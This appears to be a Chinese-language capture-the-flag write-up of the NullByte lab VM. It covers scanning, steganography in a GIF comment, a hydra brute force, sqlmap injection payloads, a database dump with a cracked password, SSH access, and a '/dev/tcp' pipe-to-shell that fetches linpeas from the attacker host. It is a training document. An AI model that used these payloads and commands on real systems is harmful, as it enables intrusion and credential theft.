信息收集

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52

┌──(root㉿kali)-[~]
└─# arp-scan 192.168.56.0/24
Interface: eth0, type: EN10MB, MAC: 00:0c:29:ef:b6:d2, IPv4: 192.168.56.107
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.56.1    0a:00:27:00:00:0d       (Unknown: locally administered)
192.168.56.100  08:00:27:d8:6c:85       PCS Systemtechnik GmbH
192.168.56.113  08:00:27:b5:82:c6       PCS Systemtechnik GmbH

3 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.139 seconds (119.68 hosts/sec). 3 responded
                                                                                                                                   
┌──(root㉿kali)-[~]
└─# nmap 192.168.56.113 -p- -sT -sV
Starting Nmap 7.95 ( https://nmap.org ) at 2026-03-07 10:22 EST
Nmap scan report for 192.168.56.113
Host is up (0.017s latency).
Not shown: 65531 closed tcp ports (conn-refused)
PORT      STATE SERVICE VERSION
80/tcp    open  http    Apache httpd 2.4.10 ((Debian))
111/tcp   open  rpcbind 2-4 (RPC #100000)
777/tcp   open  ssh     OpenSSH 6.7p1 Debian 5 (protocol 2.0)
45114/tcp open  status  1 (RPC #100024)
MAC Address: 08:00:27:B5:82:C6 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 26.07 seconds

┌──(root㉿kali)-[~]
└─# gobuster dir -u http://192.168.56.113/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://192.168.56.113/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/uploads              (Status: 301) [Size: 318] [--> http://192.168.56.113/uploads/]
/javascript           (Status: 301) [Size: 321] [--> http://192.168.56.113/javascript/]
/phpmyadmin           (Status: 301) [Size: 321] [--> http://192.168.56.113/phpmyadmin/]
/server-status        (Status: 403) [Size: 302]
Progress: 220560 / 220561 (100.00%)
===============================================================
Finished
===============================================================

尝试 phpmyadmin 漏洞

参考 phpmyadmin漏洞汇总-CSDN博客

尝试获取 phpmyadmin 版本

 1
 2
 3
 4
 5
 6
 7
 8
 9
10

/readme
/readme.php
/README
/changelog
/Change
/changelog.php  
/Documetation.html 
/Documetation.txt 
/translators.html
/doc/html/index.html

都获取不到

尝试弱密码爆破登录,失败

尝试 nday ,都不行

这几个目录也没权限

1
2
3

/uploads      
/javascript      
/server-status

选择放弃,看WP

图片隐写

原来考点是图片隐写,没有考虑过这个思路

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37


┌──(root㉿kali)-[~]
└─# wget http://192.168.56.113/main.gif
--2026-03-24 10:39:42--  http://192.168.56.113/main.gif
Connecting to 192.168.56.113:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 16647 (16K) [image/gif]
Saving to: ‘main.gif’

main.gif                      100%[=================================================>]  16.26K  --.-KB/s    in 0.01s

2026-03-24 10:39:42 (1.20 MB/s) - ‘main.gif’ saved [16647/16647]


┌──(root㉿kali)-[~]
└─# exiftool main.gif
ExifTool Version Number         : 13.25
File Name                       : main.gif
Directory                       : .
File Size                       : 17 kB
File Modification Date/Time     : 2015:08:01 12:39:30-04:00
File Access Date/Time           : 2026:03:24 10:39:42-04:00
File Inode Change Date/Time     : 2026:03:24 10:39:42-04:00
File Permissions                : -rw-r--r--
File Type                       : GIF
File Type Extension             : gif
MIME Type                       : image/gif
GIF Version                     : 89a
Image Width                     : 235
Image Height                    : 302
Has Color Map                   : No
Color Resolution Depth          : 8
Bits Per Pixel                  : 1
Background Color                : 0
Comment                         : P-): kzMb5nVYJw
Image Size                      : 235x302
Megapixels                      : 0.071

得到 Comment : P-): kzMb5nVYJw

尝试 phpmyadmin 密码,失败

发现是目录

image-20260324224622946

image-20260324224607463

有提示

密码爆破

尝试密码爆破

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12

┌──(root㉿kali)-[~]
└─# hydra 192.168.56.113 http-form-post "/kzMb5nVYJw/index.php:key=^PASS^:invalid key" -l admin -P /usr/share/wordlists/rockyou.txt
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2026-03-24 10:52:10
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking http-post-form://192.168.56.113:80/kzMb5nVYJw/index.php:key=^PASS^:invalid key
[STATUS] 4201.00 tries/min, 4201 tries in 00:01h, 14340198 to do in 56:54h, 16 active
[STATUS] 4334.67 tries/min, 13004 tries in 00:03h, 14331395 to do in 55:07h, 16 active
[80][http-post-form] host: 192.168.56.113   login: admin   password: elite
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2026-03-24 10:58:03

得到密码 elite

尝试登录 phpmyadmin 失败

放弃 phpmyadmin

sql注入

尝试直接在 Search for usernames 功能测试 sql注入

image-20260324230717037

在尝试加一个"报错,两个"正常,说明存在 sql注入漏洞

image-20260324230913304

这个注入较简单,就用 sqlmap 跑了

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46

┌──(root㉿kali)-[~]
└─#  sqlmap -u "http://192.168.56.113/kzMb5nVYJw/420search.php?usrtosearch=1" -batch --silent -D seth -T users --dump
        ___
       __H__
 ___ ___["]_____ ___ ___  {1.10.3.10#dev}
|_ -| . [(]     | .'| . |
|___|_  ["]_|_|_|__,|  _|
      |_|V...       |_|   https://sqlmap.org


[*] starting @ 11:20:52 /2026-03-24/

sqlmap resumed the following injection point(s) from stored session:
---
Parameter: usrtosearch (GET)
    Type: boolean-based blind
    Title: OR boolean-based blind - WHERE or HAVING clause (NOT - MySQL comment)
    Payload: usrtosearch=1" OR NOT 7415=7415#

    Type: error-based
    Title: MySQL >= 5.1 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (EXTRACTVALUE)
    Payload: usrtosearch=1" AND EXTRACTVALUE(9161,CONCAT(0x5c,0x7171716b71,(SELECT (ELT(9161=9161,1))),0x716a626b71))-- joVK

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: usrtosearch=1" AND (SELECT 2648 FROM (SELECT(SLEEP(5)))LRcq)-- LFtL

    Type: UNION query
    Title: MySQL UNION query (NULL) - 3 columns
    Payload: usrtosearch=1" UNION ALL SELECT CONCAT(0x7171716b71,0x5a42574b6f696a70566c716c6b63676c5a76786e41576b59756a667943416f416f4378775668504d,0x716a626b71),NULL,NULL#
---
web server operating system: Linux Debian 8 (jessie)
web application technology: Apache 2.4.10
back-end DBMS: MySQL >= 5.1
Database: seth
Table: users
[2 entries]
+----+---------------------------------------------+--------+------------+
| id | pass                                        | user   | position   |
+----+---------------------------------------------+--------+------------+
| 1  | YzZkNmJkN2ViZjgwNmY0M2M3NmFjYzM2ODE3MDNiODE | ramses | <blank>    |
| 2  | --not allowed--                             | isis   | employee   |
+----+---------------------------------------------+--------+------------+


[*] ending @ 11:20:52 /2026-03-24/

1
2
3

┌──(root㉿kali)-[~]
└─# echo "YzZkNmJkN2ViZjgwNmY0M2M3NmFjYzM2ODE3MDNiODE" | base64 -d
c6d6bd7ebf806f43c76acc3681703b81

base64解码后 MD5在线解密

image-20260324232410725

得到密码 omega

ssh登录

 1
 2
 3
 4
 5
 6
 7
 8
 9
10
11
12
13
14
15
16
17
18
19

┌──(root㉿kali)-[~]
└─# ssh ramses@192.168.56.113 -p 777
The authenticity of host '[192.168.56.113]:777 ([192.168.56.113]:777)' can't be established.
ED25519 key fingerprint is SHA256:qwvVlash7TV33eAaRVfTtUXVDL3X94TXIadEOmWw6gQ.
This key is not known by any other names.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '[192.168.56.113]:777' (ED25519) to the list of known hosts.
ramses@192.168.56.113's password:

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Sun Aug  2 01:38:58 2015 from 192.168.1.109
ramses@NullByte:~$ id
uid=1002(ramses) gid=1002(ramses) groups=1002(ramses)
ramses@NullByte:~$

ssh登录成功,如果失败的话可以尝试sql注入反弹shell

内网信息收集

使用 linpeas.sh

发现靶机禁用 curl

在 Kali

1
2
3
4

┌──(root㉿kali)-[~]
└─# nc -lvnp 80 < linpeas.sh
listening on [any] 80 ...
connect to [192.168.56.107] from (UNKNOWN) [192.168.56.113] 40414

靶机 :

1
2
3
4

ramses@NullByte:~$ curl -L https://github.com/peass-ng/PEASS-ng/releases/latest/download/linpeas.sh | sh
-bash: curl: command not found
ramses@NullByte:~$ cat < /dev/tcp/192.168.56.107/80 | sh
# 省略了linpeas结果

得到

1

-rwsr-xr-x 1 root root 4.9K Aug  2  2015 /var/www/backup/procwatch (Unknown SUID binary!)